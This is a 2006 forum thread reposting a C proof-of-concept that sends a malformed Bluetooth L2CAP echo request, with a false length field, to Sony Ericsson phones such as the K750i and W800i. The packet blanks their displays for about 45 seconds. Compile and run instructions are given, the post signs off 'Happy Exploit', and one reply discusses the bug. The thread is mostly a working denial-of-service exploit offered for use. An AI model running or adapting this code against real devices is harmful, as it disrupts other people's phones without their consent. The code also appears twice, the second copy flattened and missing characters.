SEMC BlueTooth Exploit, K600i, V600i, K750i, W800i and maybe other ones - GSM-Forum

Zaihtam · 02-10-2006, 13:04

/* Sony/Ericsson reset display - PoC */
/* Pierre BETOUIN - [email protected] */
/* 05-02-2006 */
/* Vulnerability found using BSS fuzzer : */
/* Download www.secuobs.com/news/05022006-bluetooth10.shml */
/* */
/* Causes anormal behaviours on some Sony/Ericsson */
/* cell phones */
/* Vulnerable tested devices : */
/* - K600i */
/* - V600i */
/* - K750i */
/* - W800i */
/* - And maybe other ones... */
/* */
/* Vulnerable devices will slowly turn their screen into */
/* black and then display a white screen. */
/* After a short period (~45sec), they will go back to */
/* their normal behaviour */
/* */
/* gcc -lbluetooth reset_display_sonyericsson.c */
/* -o reset_display_sonyericsson */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE 4
#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)

int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;

if(argc < 2)
{
fprintf(stderr, "%s <btaddr>\n", argv[0]);
exit(EXIT_FAILURE);
}

if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
{
perror("socket");
exit(EXIT_FAILURE);
}

memset(&addr, 0, sizeof(addr));
addr.l2_family = AF_BLUETOOTH;

if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("bind");
exit(EXIT_FAILURE);
}

str2ba(argv[1], &addr.l2_bdaddr);

if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("connect");
exit(EXIT_FAILURE);
}

if(!(buffer = (char *) malloc ((int) SIZE + 1)))
{
perror("malloc");
exit(EXIT_FAILURE);
}

memset(buffer, 90, SIZE);

cmd = (l2cap_cmd_hdr *) buffer;
cmd->code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = FAKE_SIZE;

if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf("L2CAP packet sent (%d)\n", sent);
}

printf("Buffer:\t");
for(i=0; i<sent; i++)
printf("%.2X ", (unsigned char) buffer[i]);
printf("\n");

free(buffer);
close(sock);
return EXIT_SUCCESS;
}

/* Happy Exploit...

Dave.W · 02-10-2006, 15:10

so it looks like sending any command to these phone with incorrect packet size will cause this malfunction?

from using a sony ericsson k750 then w800 then w550 and seeing how "unpolished" the software is, i am not surprised by this. and i think there will be other, more malicious bugs in the softwares...

02-10-2006, 13:04	#1 (permalink)
Zaihtam No Life Poster Join Date: Dec 2004 Location: 0x001FD00 Posts: 1,285 Member: 98572 Status: Offline Thanks Meter: 36	SEMC BlueTooth Exploit, K600i, V600i, K750i, W800i and maybe other ones /* Sony/Ericsson reset display - PoC / / Pierre BETOUIN - [email protected] / / 05-02-2006 / / Vulnerability found using BSS fuzzer : / / Download www.secuobs.com/news/05022006-bluetooth10.shml / / / / Causes anormal behaviours on some Sony/Ericsson / / cell phones / / Vulnerable tested devices : / / - K600i / / - V600i / / - K750i / / - W800i / / - And maybe other ones... / / / / Vulnerable devices will slowly turn their screen into / / black and then display a white screen. / / After a short period (~45sec), they will go back to / / their normal behaviour / / / / gcc -lbluetooth reset_display_sonyericsson.c / / -o reset_display_sonyericsson / / ./reset_display_sonyericsson 00:12:EE:XX:XX:XX / #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/l2cap.h> #define SIZE 4 #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) int main(int argc, char argv) { char buffer; l2cap_cmd_hdr cmd; struct sockaddr_l2 addr; int sock, sent, i; if(argc < 2) { fprintf(stderr, "%s <btaddr>\n", argv[0]); exit(EXIT_FAILURE); } if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("socket"); exit(EXIT_FAILURE); } memset(&addr, 0, sizeof(addr)); addr.l2_family = AF_BLUETOOTH; if (bind(sock, (struct sockaddr ) &addr, sizeof(addr)) < 0) { perror("bind"); exit(EXIT_FAILURE); } str2ba(argv[1], &addr.l2_bdaddr); if (connect(sock, (struct sockaddr ) &addr, sizeof(addr)) < 0) { perror("connect"); exit(EXIT_FAILURE); } if(!(buffer = (char ) malloc ((int) SIZE + 1))) { perror("malloc"); exit(EXIT_FAILURE); } memset(buffer, 90, SIZE); cmd = (l2cap_cmd_hdr ) buffer; cmd->code = L2CAP_ECHO_REQ; cmd->ident = 1; cmd->len = FAKE_SIZE; if( (sent=send(sock, buffer, SIZE, 0)) >= 0) { printf("L2CAP packet sent (%d)\n", sent); } printf("Buffer:\t"); for(i=0; i<sent; i++) printf("%.2X ", (unsigned char) buffer[i]); printf("\n"); free(buffer); close(sock); return EXIT_SUCCESS; } / Happy Exploit...

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
WTB polar box and maybe others	almobilelink	Sell ur Old and Used Stuff	1	07-28-2009 14:28
Lang pack on new Moto phones like Z8 and maybe others.	Raklm	Smart-Clip	3	09-01-2008 07:21
JAVA PROGRAMS for K750i / W800i / D750i / K700i / W550i / W600i / K600i	vishnugsm	Sony Ericsson Media, RingTones, Games	2	01-21-2007 19:13
k750i/w800i no bluetooth	Jamieev	Sony Ericsson	2	12-14-2006 03:25
after flashing K750i@w800i bluetooth	jun36	Sony Ericsson Hardware Repair	1	09-07-2005 18:56

02-10-2006, 15:10	#2 (permalink)
Dave.W No Life Poster Join Date: Nov 2001 Location: England Age: 41 Posts: 2,821 Member: 7653 Status: Offline Thanks Meter: 823	so it looks like sending any command to these phone with incorrect packet size will cause this malfunction? from using a sony ericsson k750 then w800 then w550 and seeing how "unpolished" the software is, i am not surprised by this. and i think there will be other, more malicious bugs in the softwares...